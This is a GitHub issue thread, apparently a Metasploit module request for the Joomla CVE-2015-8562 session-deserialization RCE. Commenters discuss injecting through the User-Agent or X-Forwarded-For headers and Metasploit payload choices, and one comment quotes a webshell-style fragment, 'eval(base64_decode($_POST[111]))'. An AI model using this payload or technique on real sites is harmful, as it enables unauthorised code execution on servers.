add me base64_decode('bXIuY2h1cmNobDMzdA=='); lol

Anybody with good knowledge of OOP's can execute this , I'm still trying.. anyone using skype..??
add me base64_decode('bXIuY2h1cmNobDMzdA=='); lol

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

ye its a good idea we can make a group and evryone give his idea in skype @icehteam

ye its a good idea we can make a group and evryone give his idea in skype @icehteam

@cyadron

This comment has been minimized.

Show comment
Hide comment
@cyadron

cyadron Dec 15, 2015

@shargon Do you mean that the next time you reload that page, session info is read from the databse and deserialized and the object is executed?

cyadron commented Dec 15, 2015

@shargon Do you mean that the next time you reload that page, session info is read from the databse and deserialized and the object is executed?

@shargon

This comment has been minimized.

Show comment
Hide comment
@shargon

shargon Dec 15, 2015

@cyadron yes,i thought is like this, for run the exploit, Its necessary make 2 calls, one per poison, two per execution

The execution part its simple, joomla deserialize the session and run the poison...

The hard work its do the correct payload for exploit it

shargon commented Dec 15, 2015

@cyadron yes,i thought is like this, for run the exploit, Its necessary make 2 calls, one per poison, two per execution

The execution part its simple, joomla deserialize the session and run the poison...

The hard work its do the correct payload for exploit it

@madmike33

This comment has been minimized.

Show comment
Hide comment
@madmike33

madmike33 Dec 15, 2015

yes what @cyadron said is true we need to cals also as @brandonprry perry stated earlier

yes what @cyadron said is true we need to cals also as @brandonprry perry stated earlier

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

guys please use IRC or Skype for discussing this exploit this issue is getting too big and too offtopic

Contributor

FireFart commented Dec 15, 2015

guys please use IRC or Skype for discussing this exploit this issue is getting too big and too offtopic

@icehteam

This comment has been minimized.

Show comment
Hide comment
@icehteam

icehteam Dec 15, 2015

My skype is base64_decode('bXIuY2h1cmNobDMzdA=='); , Let me know urs folks.

My skype is base64_decode('bXIuY2h1cmNobDMzdA=='); , Let me know urs folks.

@shargon

This comment has been minimized.

Show comment
Hide comment
@madmike33

This comment has been minimized.

Show comment
Hide comment
@cyadron

This comment has been minimized.

Show comment
Hide comment
@cyadron

cyadron Dec 15, 2015

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

cyadron commented Dec 15, 2015

The code from freebuf gives an error:
assert(): Assertion "eval(base64_decode($_POST[111]));JFactory::getConfig();exit;" failed

@borismattijssen

This comment has been minimized.

Show comment
Hide comment
@borismattijssen

borismattijssen Dec 15, 2015

edit:
decided to remove the screenshot as I just posted it out of excitement not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

edit:
decided to remove the screenshot as I just posted it out of excitement not to brag or anything. I'm glad the issue is closed and the shiny module will be there soon.

@jstnkndy

This comment has been minimized.

Show comment
Hide comment
@jstnkndy

jstnkndy Dec 15, 2015

Contributor

@borismattijssen What's the purpose of posting a screenshot but no technical details?

Contributor

jstnkndy commented Dec 15, 2015

@borismattijssen What's the purpose of posting a screenshot but no technical details?

@borismattijssen

This comment has been minimized.

Show comment
Hide comment
@borismattijssen

borismattijssen Dec 15, 2015

@jstnkndy I feel like the vulnerability is too young to share the technical details on the internet..

@jstnkndy I feel like the vulnerability is too young to share the technical details on the internet..

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

lol

Contributor

FireFart commented Dec 15, 2015

lol

@jstnkndy

This comment has been minimized.

Show comment
Hide comment
@jstnkndy

jstnkndy Dec 15, 2015

Contributor

so the screenshot is just.... bragging?

Contributor

jstnkndy commented Dec 15, 2015

so the screenshot is just.... bragging?

@borismattijssen

This comment has been minimized.

Show comment
Hide comment
@borismattijssen

borismattijssen Dec 15, 2015

just showing it isn't that hard..

just showing it isn't that hard..

@falconz

This comment has been minimized.

Show comment
Hide comment
@falconz

falconz Dec 15, 2015

@borismattijssen I see vulnerable in user agent or xfowarder, why do you hidden URI?

falconz commented Dec 15, 2015

@borismattijssen I see vulnerable in user agent or xfowarder, why do you hidden URI?

@deftskiddie

This comment has been minimized.

Show comment
Hide comment
@deftskiddie

deftskiddie Dec 15, 2015

@falconz my guess, it is not a private address lol

@falconz my guess, it is not a private address lol

@FireFart

This comment has been minimized.

Show comment
Hide comment
@FireFart

FireFart Dec 15, 2015

Contributor

closing this because the details are public available and a module is also ready

Contributor

FireFart commented Dec 15, 2015

closing this because the details are public available and a module is also ready

@FireFart FireFart closed this Dec 15, 2015

@wchen-r7

This comment has been minimized.

Show comment
Hide comment
@wchen-r7

wchen-r7 Dec 15, 2015

Contributor

@FireFart In your commit, I recommend just do Resolve #6347. That way when your PR lands, this issue automatically tags and closes it. And if you want to end the conversation early, I guess we can try to lock it (it is a button for me).

Contributor

wchen-r7 commented Dec 15, 2015

@FireFart In your commit, I recommend just do Resolve #6347. That way when your PR lands, this issue automatically tags and closes it. And if you want to end the conversation early, I guess we can try to lock it (it is a button for me).

@wvu-r7

This comment has been minimized.

Show comment
Hide comment
@wvu-r7

wvu-r7 Dec 17, 2015

Contributor

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

Contributor

wvu-r7 commented Dec 17, 2015

Module merged in #6355. Btw, here's why we were failing: #6355 (comment). :-)

@wchen-r7 wchen-r7 changed the title from [Request] Critical 0day RCE in joomla to [Request] Critical 0day RCE in Joomla (CVE-2015-8562) Dec 17, 2015

@GHOST07v

This comment has been minimized.

Show comment
Hide comment
@GHOST07v

GHOST07v Dec 18, 2015

Does not work with me...

Does not work with me...

@ggg4566

This comment has been minimized.

Show comment
Hide comment
@ggg4566

ggg4566 Dec 19, 2015

Does not work to version below 3.x , need find other trick

ggg4566 commented Dec 19, 2015

Does not work to version below 3.x , need find other trick

@bgeesaman

This comment has been minimized.

Show comment
Hide comment
@bgeesaman

bgeesaman Dec 20, 2015

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

Try one of the generic/shell or php/exec payloads. Do those work for you? I can get those to work, but not the php meterpreter variants on the three systems I built to test this on.

@JohnMartinelli

This comment has been minimized.

Show comment
Hide comment
@JohnMartinelli

JohnMartinelli Dec 20, 2015

If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY
FOR CODING THE FIXES as I have never contributed to an open source
project (big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for
you? I can get those to work, but not the php meterpreter variants on
the three systems I built to test this on.


Reply to this email directly or view it on GitHub
#6347 (comment).

If this needs CODE to be solved, then I WANT TO TAKE FULL RESPONSIBILITY
FOR CODING THE FIXES as I have never contributed to an open source
project (big one, at least) directly. :)

So... tell me exactly what you need me to code.

On Saturday 19 December 2015 09:08 PM, bgeesaman wrote:

Try one of the generic/shell or php/exec payloads. Do those work for
you? I can get those to work, but not the php meterpreter variants on
the three systems I built to test this on.


Reply to this email directly or view it on GitHub
#6347 (comment).

@icehteam

This comment has been minimized.

Show comment
Hide comment
@icehteam

icehteam Dec 20, 2015

@ggg4566 X-Forward working in 3x , You need use user agent for some versions. @JohnMartinelli your late at the party fff...

@ggg4566 X-Forward working in 3x , You need use user agent for some versions. @JohnMartinelli your late at the party fff...

@am06

This comment has been minimized.

Show comment
Hide comment
@am06

am06 Dec 21, 2015

I've read that a session_decode() bug is needed for this to work....? Anyone can please tell me what's that bug about?

am06 commented Dec 21, 2015

I've read that a session_decode() bug is needed for this to work....? Anyone can please tell me what's that bug about?

@VivekShingala

This comment has been minimized.

Show comment
Hide comment
@VivekShingala

VivekShingala Oct 6, 2017

Is this error harmful for other frameworks like codeigniter or core php websites? Have found these logs in such frameworks. I do not use Joomla for most of the sites, however, still find this logs.

If yes, what steps to be taken to prevent?

Is this error harmful for other frameworks like codeigniter or core php websites? Have found these logs in such frameworks. I do not use Joomla for most of the sites, however, still find this logs.

If yes, what steps to be taken to prevent?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment